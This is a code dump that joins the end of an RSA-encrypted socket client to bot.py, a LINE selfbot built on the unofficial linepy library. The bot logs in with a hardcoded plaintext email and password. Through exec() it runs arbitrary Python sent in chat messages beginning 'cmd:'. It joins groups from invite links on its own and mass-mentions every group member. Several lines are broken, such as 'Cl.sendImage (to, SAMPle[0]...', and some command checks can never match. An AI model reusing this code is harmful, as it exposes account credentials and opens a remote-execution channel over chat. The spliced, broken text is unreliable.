msg_len = int(msg[:HEADERSIZE])
new_msg = False
full_msg += msg
if(len(full_msg) - HEADERSIZE == msg_len):
actual_full_message.append(full_msg[HEADERSIZE:])
raise ExitTryExcept
except ExitTryExcept:
pass
except Exception as e:
self._latest_statuses.append(Status(21, self._target))
cont = False
# Assemble message
full_message_dec = b""
for i in actual_full_message:
full_message_dec += decrypt(i, self._private_key)
if self._utf8:
self._latest_statuses.append(Status(8, (full_message_dec.decode("utf-8"), self._target)))
else:
self._latest_statuses.append(Status(8, (full_message_dec, self._target)))
raise ExitTryExcept
except ExitTryExcept:
pass
except:
# Failed connection
self._latest_statuses.append(Status(14, self._target))
sleep(5)
def start(self, target: str, utf8: bool=True):
"""
Start the Encwork client.
`target: str` The server to connect to.
`utf8: bool` Whether or not to send/receive encoded as UTF-8. Must be `False` for receiving/sending files such as executables or media.
"""
self._utf8 = utf8
self._target = target
Thread(target=self._connection).start()
def send_msg(self, message: str):
"""
Send a message to the server.
`message: str` The message to send. Should be str if utf8=True, and bytes if utf8=False.
"""
# See if there is a target
if self._target is None:
raise NoTargetError("No target is available to send messages to.")
# See if a public key has been received
if self._peer_public_key is None:
raise NoEncryptionKeyError("There is no public key to encrypt with.")
# Tell the peer many messages that come in are a part of this one
# (Done due to the size limit of RSA keys)
split_size = ceil(len(message)/446)
split_size_enc = self.headerify(encrypt(bytes(str(split_size), "utf-8"), self._peer_public_key))
self._s.send(split_size_enc)
# Send the message in as many parts as needed
self._latest_statuses.append(Status(16, self._target))
for i in range(split_size):
if self._utf8:
self._s.send(self.headerify(encrypt(bytes(message[446*i:446*(i+1)], "utf-8"), self._peer_public_key)))
else:
self._s.send(self.headerify(encrypt(message[446*i:446*(i+1)], self._peer_public_key)))
self._latest_statuses.append(Status(17, self._target)) |
bot.py | # -*- coding: utf-8 -*-
from linepy import *
####################################################
from liff.ttypes import *
####################################################
from akad.ttypes import *
####################################################
from datetime import datetime, timedelta
####################################################
from bs4 import BeautifulSoup
####################################################
from humanfriendly import format_timespan, format_size, format_number, format_length
####################################################
from threading import Thread
####################################################
from io import StringIO
####################################################
import multiprocessing
####################################################
from urllib.parse import urlencode
####################################################
from random import randint
####################################################
from time import sleep
####################################################
import matplotlib.pyplot as plt
####################################################
import pandas as pd
####################################################
from gtts import gTTS
####################################################
from googletrans import Translator
####################################################
from Naked.toolshed.shell import execute_js
####################################################
import platform, shutil, socket, time, random, sys, json, codecs, threading, threadpool, glob, re, string, os, requests, subprocess, six, ast, urllib, urllib.parse, timeit, atexit, youtube_dl, pafy, pytz, asyncio, humanize, traceback, ssl, psutil, uvloop
####################################################
_session = requests.session()
try:
import urllib.request as urllib2
except ImportError:
import urllib2
####################################################
os.system('clear')
####################################################
cl = LINE("svrlego115@gmail.com","rahmagila123")
####################################################
clMID = cl.profile.mid
oepoll = OEPoll(cl)
set = {
"owner": ["u9be8862cb884bde356d0e41fb6850514"],
"ccmd": {
"liffurl": [".liffurl"],
"time": [".time"],
"date": [".date"],
"lasttag": [".lasttag"],
"logout": [".logout"],
"oplist": [".oplist"],
"restart": [".restart"],
"status": [".status"],
"findoa": [".findoa"],
"ttag": [".ttag"],
"stag": [".stag"],
"ltag": [".ltag"]
},
"lastt": {},
"aprol": 1
}
set2 = {
"jg": True,
"lj": True,
"lg": False,
"lr": False,
"apro": False,
"protect": False,
"getmid": True,
"flwrm": False,
"debugall": False
}
test = {
"debug": ["c846fec69c4f52feb32f00cf8970a95bc"],
"debugbd": "rbd07ffb48c082bab980cfd02be9e3837",
"2": True
}
if clMID not in set["owner"]:
set["owner"].append(clMID)
print("Login Success")
def ismid(mid):
try:
cl.getContact(mid)
return True
except:
return False
def allowLiff(ChannelId='1655527991'):
url = 'https://access.line.me/dialog/api/permissions'
data = {
'on': [
'P',
'CM'
],
'off': []
}
headers = {
'X-Line-Access': cl.authToken,
'X-Line-Application': cl.server.APP_NAME,
'X-Line-ChannelId': ChannelId,
'Content-Type': 'application/json'
}
requests.post(url, json=data, headers=headers)
def sendTemplate(to, data):
xyz = LiffChatContext(to)
xyzz = LiffContext(chat=xyz)
view = LiffViewRequest('1655527991-3Lbo8OkW', xyzz)
token = cl.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages": [data]}
requests.post(url, headers=headers, data=json.dumps(data))
def lineBot(op):
try:
if op.type == 0:
return
if op.type in [5]:
cl.findAndAddContactsByMid(op.param1)
elif op.type in [13, 124]:
if clMID in op.param3:
if set2["jg"] == True:
cl.acceptGroupInvitation(op.param1)
elif op.type in [22]:
if clMID in op.param3:
room = cl.getRoom(op.param1)
if set2["lr"]:
cl.leaveRoom(op.param1)
elif op.type in [25, 26]:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if text is None:
cmd = ""
else:
cmd = text.lower()
if set2["getmid"] == True:
if 'u' in cmd:
mids_re = re.compile("u[a-z0-9]{32}")
mids = mids_re.findall(cmd)
targets = []
for l in mids:
if l not in targets:
if ismid(l):
targets.append(l)
for target in targets:
cl.sendContact(to, target)
if 'MENTION' in msg.contentMetadata.keys() != None:
mentionees = ast.literal_eval(
msg.contentMetadata['MENTION'])['MENTIONEES']
for mention in mentionees:
if clMID in mention["M"]:
set["lastt"]["msgid"] = msg_id
set["lastt"]["mid"] = sender
set["lastt"]["to"] = to
set["lastt"]["time"] = datetime.now(tz=pytz.timezone(
"Asia/Jakarta")).strftime('%Y/%m/%d %H:%M:%S')
if set2["lj"] == True:
if "/ti/g/" in text:
link_re = re.compile(
'(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
try:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(
group.id, ticket_id)
except Exception as e:
if str(e.reason) == "request blocked":
cl.relatedMessage(to, "Current account regulation", msg_id)
elif "Ticket not found" in str(e.reason):
cl.relatedMessage(to, "This URL has been invalidated", msg_id)
elif "Prevented join by group ticket" in str(e.reason):
cl.relatedMessage(to, "The group does not open the URL to join", msg_id)
else:
cl.relatedMessage(to, "Income\n"+str(e), msg_id)
time.sleep(0.5)
if msg.contentType == 6:
timeNow = datetime.now(tz=pytz.timezone("Asia/Jakarta")).strftime('%Y/%m/%d %H:%M:%S')
b = msg.contentMetadata['GC_EVT_TYPE']
c = msg.contentMetadata["GC_MEDIA_TYPE"]
if c == 'AUDIO' and b == "S":
arg = "Start call"
arg += "\nTypes of: voice"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
if c == 'VIDEO' and b == "S":
arg = "Start call"
arg += "\nTypes of: Video"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
if c == 'LIVE' and b == "S":
arg = "Start call"
arg += "\nTypes of: LIVE"
arg += "\nInitiator: @!"
arg += f"\nStart time: {timeNow}"
else:
mills = int(msg.contentMetadata["DURATION"])
seconds = (mills / 1000) % 60
if c == "AUDIO" and b == "E":
arg = "End talk"
arg += "\nTypes of: voice"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if c == "VIDEO" and b == "E":
arg = "End talk"
arg += "\nTypes of: Video"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if c == "LIVE" and b == "E":
arg = "End talk"
arg += "\nTypes of: LIVE"
arg += "\nInitiator: @!"
arg += f"\nEnd Time: {timeNow}"
arg += f"\nduration: {seconds} second"
if sender in set["owner"]:
if cmd in ['help', 'allcmd', 'cmds', '幫助', '指令表', '指令']:
ret_ = "[General instruction]"
for a in set['ccmd']:
ret_ += "\n{} (key: {})".format(set['ccmd'][a], a)
ret_ += "\n\n[Other instructions]\n[Retrieve message]\nun:number\n[Permission adjustment]\nop:(@/mid)s\n[Switch function method]\nset:function name\n[Customary command method]\n+)ccmd:key:cmd\n-)dcmd:cmd"
cl.relatedMessage(to, ret_, msg_id)
elif cmd == 'test1':
uda = cl.getContact(sender)
if uda.pictureStatus is None:
uda0 = "not"
uda1 = "https://upload.cc/i1/2021/02/11/b0PkA1.png"
else:
uda0 = "Already"
uda1 = "https://obs.line-scdn.net/" + uda.pictureStatus
if uda.videoProfile is None:
uda2 = "not"
else:
uda2 = "Already"
if uda.musicProfile is None:
uda3 = "not"
else:
uda3 = "Already"
if uda.createdTime == 0:
uda4 = "not"
uda5 = "No friends have already added"
else:
uda4 = "Already"
uda5 = time.strftime(
"%Y/%m/%d %H:%M:%S", time.localtime(int(uda.createdTime) / 1000))
if uda.favoriteTime == 0:
uda6 = "not"
uda7 = "Have not joined"
else:
uda6 = "Already"
uda7 = time.strftime(
"%Y/%m/%d %H:%M:%S", time.localtime(int(uda.favoriteTime) / 1000))
if sender in set["owner"]:
uda8 = "Have"
uda9 = "Not"
else:
uda8 = "No"
uda9 = "Yes"
gidsl = []
for id in cl.getGroupIdsJoined():
if sender in [contact.mid for contact in cl.getGroup(id).members]:
gidsl.append(id)
uda10 = str(len(gidsl))
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "carousel",
"contents": [
{
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "https://i.imgur.com/60dAA9r.jpg",
"size": "full",
"aspectMode": "cover",
"aspectRatio": "3:5",
"gravity": "top"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "{}".format(uda1),
"size": "full",
"aspectMode": "cover"
}
],
"width": "100px",
"height": "100px",
"cornerRadius": "100px"
}
],
"width": "100%",
"justifyContent": "center"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "separator",
"margin": "lg",
"color": "#2894FF"
},
{
"type": "text",
"text": "User information-Basic",
"size": "xl",
"color": "#ffffff",
"weight": "bold",
"align": "center",
"margin": "md"
},
{
"type": "separator",
"margin": "sm",
"color": "#2894FF"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "name",
"weight": "bold"
},
{
"type": "text",
"text": " {}".format(uda.displayName),
"wrap": True
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "name",
"weight": "bold"
},
{
"type": "text",
"text": " {}".format(uda.displayNameOverridden),
"wrap": True
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Signature number",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(str(len(uda.statusMessage))),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Static head sticker",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda0),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Dynamic head stickers",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda2),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Background music state",
"weight": "bold"
},
{
"type": "text",
"text": "{} Mount".format(uda3),
"align": "end"
}
]
}
],
"margin": "lg"
}
],
"position": "absolute",
"offsetBottom": "0px",
"offsetStart": "0px",
"offsetEnd": "0px",
"backgroundColor": "#BEBEBEaa",
"paddingAll": "20px",
"paddingTop": "18px",
"offsetTop": "0px"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "filler"
},
{
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "filler"
},
{
"type": "icon",
"url": "https://i.ibb.co/0Jc95vm/3032276.png"
},
{
"type": "text",
"text": "Friend directly",
"color": "#FF0000",
"flex": 0,
"offsetTop": "-2px",
"weight": "bold"
},
{
"type": "filler"
}
],
"spacing": "sm"
},
{
"type": "filler"
}
],
"borderWidth": "1px",
"cornerRadius": "4px",
"spacing": "sm",
"borderColor": "#2894FF",
"margin": "xxl",
"height": "40px",
"backgroundColor": "#9D9D9Daa",
"action": {
"type": "uri",
"uri": "line://nv/profilePopup/mid={}".format(sender)
}
}
],
"position": "absolute",
"offsetBottom": "0px",
"paddingAll": "20px",
"offsetStart": "0px",
"offsetEnd": "0px"
}
],
"paddingAll": "0px"
}
},
{
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "image",
"url": "https://i.imgur.com/oscMAJd.jpg",
"size": "full",
"aspectMode": "cover",
"aspectRatio": "3:5",
"gravity": "top"
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "separator",
"margin": "lg",
"color": "#2894FF"
},
{
"type": "text",
"text": "User information-Advancement",
"size": "xl",
"color": "#ffffff",
"weight": "bold",
"align": "center",
"margin": "md"
},
{
"type": "separator",
"margin": "sm",
"color": "#2894FF"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Friend status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Join".format(uda4),
"align": "end"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Join your friends",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda5)
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Favorite state",
"weight": "bold"
},
{
"type": "text",
"text": "{} Join".format(uda6),
"align": "end"
}
]
},
{
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Join the favorite time",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda7)
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Authority status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Authority".format(uda8),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Black single status",
"weight": "bold"
},
{
"type": "text",
"text": "{} Black single".format(uda9),
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Common group quantity",
"weight": "bold"
},
{
"type": "text",
"text": "{}".format(uda10),
"align": "end"
}
]
}
],
"margin": "lg"
}
],
"position": "absolute",
"offsetBottom": "0px",
"offsetStart": "0px",
"offsetEnd": "0px",
"backgroundColor": "#BEBEBEaa",
"paddingAll": "20px",
"paddingTop": "18px",
"offsetTop": "0px"
}
],
"paddingAll": "0px"
}
}
]
}
}
sendTemplate(to, dat)
elif cmd == 'test2':
if test["2"] == True:
urii = "https://scdn.line-apps.com/n/channel_devcenter/img/flexsnapshot/clip/clip11.jpg"
urit = "line://app/1655527991-3Lbo8OkW?type=text&text=I want to close"
else:
urii = "https://scdn.line-apps.com/n/channel_devcenter/img/flexsnapshot/clip/clip10.jpg"
urit = "line://app/1655527991-3Lbo8OkW?type=text&text=I want to open"
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Group intelligence",
"weight": "bold",
"size": "xl"
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "BAO?",
"gravity": "center"
},
{
"type": "image",
"url": urii,
"action": {
"type": "uri",
"uri": urit
}
}
]
}
]
}
}
}
sendTemplate(to, dat)
elif cmd == 'I want to open':
test["2"] = True
cl.relatedMessage(to, "ok\nTrue", msg_id)
elif cmd == 'I want to close':
test["2"] = False
cl.relatedMessage(to, "ok\nFalse", msg_id)
elif cmd == 'test3':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Payment notice",
"weight": "bold",
"color": "#1DB446",
"size": "sm"
},
{
"type": "text",
"text": "Payment",
"weight": "bold",
"size": "xxl",
"margin": "md"
},
{
"type": "separator",
"margin": "xxl"
},
{
"type": "box",
"layout": "vertical",
"margin": "xxl",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Permanent semi-scale",
"size": "sm",
"color": "#555555",
"flex": 0
},
{
"type": "text",
"text": "x 1",
"size": "sm",
"color": "#111111",
"align": "end"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"margin": "xxl",
"contents": [
{
"type": "text",
"text": "Quantity",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "1",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "total",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "payment method:cash",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Zero",
"size": "sm",
"color": "#555555"
},
{
"type": "text",
"text": "$0",
"size": "sm",
"color": "#111111",
"align": "end"
}
]
}
]
},
{
"type": "separator",
"margin": "xxl"
},
{
"type": "box",
"layout": "horizontal",
"margin": "md",
"contents": [
{
"type": "text",
"text": "Order number",
"size": "xs",
"color": "#aaaaaa",
"flex": 0
},
{
"type": "text",
"text": "#0000000000",
"color": "#aaaaaa",
"size": "xs",
"align": "end"
}
]
}
]
},
"styles": {
"footer": {
"separator": True
}
}
}
}
sendTemplate(to, dat)
elif cmd == 'test4':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/01_1_cafe.png",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "http://linecorp.com/"
}
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Brown Cafe",
"weight": "bold",
"size": "xl"
},
{
"type": "box",
"layout": "baseline",
"margin": "md",
"contents": [
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gold_star_28.png"
},
{
"type": "icon",
"size": "sm",
"url": "https://scdn.line-apps.com/n/channel_devcenter/img/fx/review_gray_star_28.png"
},
{
"type": "text",
"text": "4.0",
"size": "sm",
"color": "#999999",
"margin": "md",
"flex": 0
}
]
},
{
"type": "box",
"layout": "vertical",
"margin": "lg",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"contents": [
{
"type": "text",
"text": "Place",
"color": "#aaaaaa",
"size": "sm",
"flex": 1
},
{
"type": "text",
"text": "Miraina Tower, 4-1-6 Shinjuku, Tokyo",
"wrap": True,
"color": "#666666",
"size": "sm",
"flex": 5
}
]
},
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"contents": [
{
"type": "text",
"text": "Time",
"color": "#aaaaaa",
"size": "sm",
"flex": 1
},
{
"type": "text",
"text": "10:00 - 23:00",
"wrap": True,
"color": "#666666",
"size": "sm",
"flex": 5
}
]
}
]
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "CALL",
"uri": "https://linecorp.com"
}
},
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "WEBSITE",
"uri": "https://linecorp.com"
}
},
None,
{
"type": "spacer",
"size": "sm"
},
],
"flex": 0
}
}
}
sendTemplate(to, dat)
elif cmd == 'test5':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {"type": "carousel", "contents": [{"type": "bubble", "header": {"type": "box", "layout": "vertical", "contents": [{"type": "text", "text": "Author - News", "wrap": True, "color": "#9023FF"}]}, "hero": {"type": "image", "url": "https://i.imgur.com/zgu5fcI.jpg", "size": "full", "aspectMode": "cover", "aspectRatio": "5:3"}, "body": {"type": "box", "layout": "vertical", "spacing": "sm", "contents": [{"type": "text", "text": "administrator: mal", "wrap": True, "margin": "sm", "maxLines": 0, "size": "md", "color": "#ffffff"}]}, "footer": {"type": "box", "layout": "vertical", "contents": [{"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Accessor friend", "uri": "line://ti/p/aDtv2LTeKS"}}, {"type": "separator", "margin": "md", "color": "#fe8cb7"}, {"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Front-end website", "uri": "https://bot.harusakura.cc"}}, {"type": "separator", "margin": "md", "color": "#fe8cb7"}, {"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Anonymous message", "uri": "https://harusakura.cc/whisper"}}]}, "styles": {"header": {"backgroundColor": "#fe8cb7"}, "hero": {"backgroundColor": "#fe8cb7"}, "body": {"backgroundColor": "#fe8cb7"}, "footer": {"backgroundColor": "#fe8cb7"}}}]}
}
sendTemplate(to, dat)
elif cmd == 'test6':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {}
}
sendTemplate(to, dat)
elif cmd == 'test7':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {}
}
sendTemplate(to, dat)
elif cmd.startswith('ud'):
if 'MENTION' in msg.contentMetadata.keys() != None:
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
if x["M"] not in targets:
targets.append(x["M"])
for target in targets:
cl.relatedMessage(
to, str(cl.getContact(target)), msg_id)
elif cmd.startswith("cmd:"):
txt = text[4:]
try:
exec(str(txt))
print('\n===caveat===\nSpecial instructions\ninstruction:cmd\nTrigger text: {}\nuser: {}\nposition: {}\n===the end===\n'.format(
text, sender, to))
except Exception as e:
cl.relatedMessage(to, "Execute command error\n"+str(e), msg_id)
elif cmd == 'cra':
a = cl.getChatRoomAnnouncements(to)
if a == []:
cl.relatedMessage(to, "Can't find", msg_id)
else:
for b in a:
c = b.contents
d = c.link
e = c.text
cl.replyMention(
msg_id, to, '[Announcement]\ncontent: {}\nBulletin:@!\nlink: {}'.format(e, d), [b.creatorMid])
elif cmd.startswith("cra:"):
a = text[4:]
b = ChatRoomAnnouncementContents()
b.displayFields = 5
b.text = a
b.link = "line://nv/chatMsg?chatId={}&messageId={}".format(
to, msg_id)
cl.createChatRoomAnnouncement(to, 0, b)
cl.relatedMessage(to, "success\ncontent: {}".format(a), msg_id)
elif cmd == "ccra":
a = cl.getChatRoomAnnouncements(to)
if a == []:
cl.relatedMessage(to, "Can't find", msg_id)
else:
for b in a:
cl.removeChatRoomAnnouncement(
to, b.announcementSeq)
cl.relatedMessage(to, "carry out", msg_id)
elif cmd == "Pumper":
paths = []
for picpaths in os.walk('./images'):
paths.append(picpaths)
sample = random.choice(paths)
#cl.sendReplyMessage(msg.id, to, "Selected file:"+sample)
#print("\n\nSelected file: "+ Sample +" \ n \ n ")
Cl.sendImage (to, SAMPle[0]+"/"+random.choice(sample[2]))
elif cmd == "Sis":
meizi = sum(len(files) for _, _, files in os.walk('./images'))
cl.relatedMessage(to, str(meizi), msg_id)
elif cmd == "Sister":
fileDir = r"./images"
fileExt = r".jpg"
w = [_ for _ in os.listdir(fileDir) if _.endswith(fileExt)]
q = 0
cl.relatedMessage(to, "removing...", msg_id)
for x in w:
q += 1
os.remove("./images/"+x)
cl.relatedMessage(to, f"ok\ndelete {q} pic", msg_id)
elif cmd in set['ccmd']['liffurl']:
cl.relatedMessage(
to, "https://liff.line.me/1655527991-3Lbo8OkW", msg_id)
elif cmd in set['ccmd']['time']:
cl.relatedMessage(to, datetime.now(tz=pytz.timezone(
"Asia/Jakarta")).strftime('%H:%M:%S'), msg_id)
elif cmd in set['ccmd']['date']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday",
"Wednesday", "Thursday", "Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]:
hasil = hari[i]
readTime = timeNow.strftime(
'%Y') + "/" + bln + "/" + timeNow.strftime('%d') + " " + hasil
cl.relatedMessage(to, readTime, msg_id)
elif cmd in set['ccmd']['lasttag']:
if set["lastt"] == {}:
cl.relatedMessage(to, "Can't find a label message", msg_id)
else:
cl.relatedMessage(to, "Caller: {} ({})\nTime: {}\nPosition: {}".format(cl.getContact(
set["lastt"]["mid"]).displayName, set["lastt"]["mid"], set["lastt"]["time"], set["lastt"]["to"]), set["lastt"]["msgid"])
elif cmd in set['ccmd']['logout']:
cl.relatedMessage(to, "Will automatically log out the machine", msg_id)
cl.relatedMessage(to, "[prompt]\nAlready automatically logged out of the background server", msg_id)
os._exit(0)
elif cmd in set['ccmd']['oplist']:
if set["owner"] == []:
cl.relatedMessage(to, "No permission", msg_id)
else:
mc = "[Permissions list]"
arr = []
mention = "@mal "
for mi_d in set["owner"]:
mc += "\n➲"
slen = str(len(mc))
elen = str(len(mc) + len(mention) - 1)
arrData = {'S': slen, 'E': elen, 'M': mi_d}
arr.append(arrData)
mc += mention
cl.sendReplyMessage(msg_id, to, mc+"\n[the end]", contentMetadata={
'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, contentType=0)
elif cmd in set['ccmd']['restart']:
python = sys.executable
os.execl(python, python, *sys.argv)
elif cmd in set['ccmd']['status']:
try:
cl.kickoutFromGroup(msg.to, ["test"])
except Exception as e:
if e.reason == "request blocked":
aa = "Regulation"
else:
aa = "Can be implemented"
try:
cl.inviteIntoGroup(msg.to, ["test"])
bb = "Can be implemented"
except:
bb = "Regulation"
try:
cl.findAndAddContactsByMid("test")
except Exception as e:
if e.reason == "request blocked":
cc = "Regulation"
else:
cc = "Can be implemented"
try:
cl.acceptGroupInvitationByTicket("test", "test")
except Exception as e:
if e.reason == "request blocked":
dd = "Regulation"
else:
dd = "Can be implemented"
cl.relatedMessage(to, "ΞΞΞΞΞ〘Machine status query〙ΞΞΞΞΞ\n※Kick:" + str(aa) + "\n※Invitation status:" + str(
bb) + "\n※Cancel state:Can be implemented\n※Advance:" + str(cc) + "\n※URL status:" + str(dd), msg_id)
elif cmd in set['ccmd']['findoa']:
oas = "[Nonmittent]"
if msg.toType == 1:
room = cl.getRoom(to)
for contact in room.contacts:
if contact.capableBuddy:
oas += "\n{}\n{}".format(cl.getContact(
contact.mid).displayName, contact.mid)
if oas == "[Nonmittent]":
cl.relatedMessage(to, "Can't find", msg_id)
else:
cl.relatedMessage(to, oas, msg_id)
elif msg.toType == 2:
group = cl.getGroup(to)
for contact in group.members:
if contact.capableBuddy:
oas += "{}\n{}".format(cl.getContact(
contact.mid).displayName, contact.mid)
if oas == "[Nonmittent]":
cl.relatedMessage(to, "Can't find", msg_id)
else:
cl.relatedMessage(to, oas, msg_id)
elif cmd in set['ccmd']['ttag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, text=txt, contentMetadata={
u'MENTION': json.dumps({'MENTIONEES': b})}, contentType=0)
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, text=txt, contentMetadata={
u'MENTION': json.dumps({'MENTIONEES': b})}, contentType=0)
elif cmd in set['ccmd']['stag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, txt, {'STKVER': '1', 'STKID': '12228774', 'STKPKGID': '1302449', u'MENTION': json.dumps({'MENTIONEES': b})}, 7)
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, txt, {'STKVER': '1', 'STKID': '12228774', 'STKPKGID': '1302449', u'MENTION': json.dumps({'MENTIONEES': b})}, 7)
elif cmd in set['ccmd']['ltag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
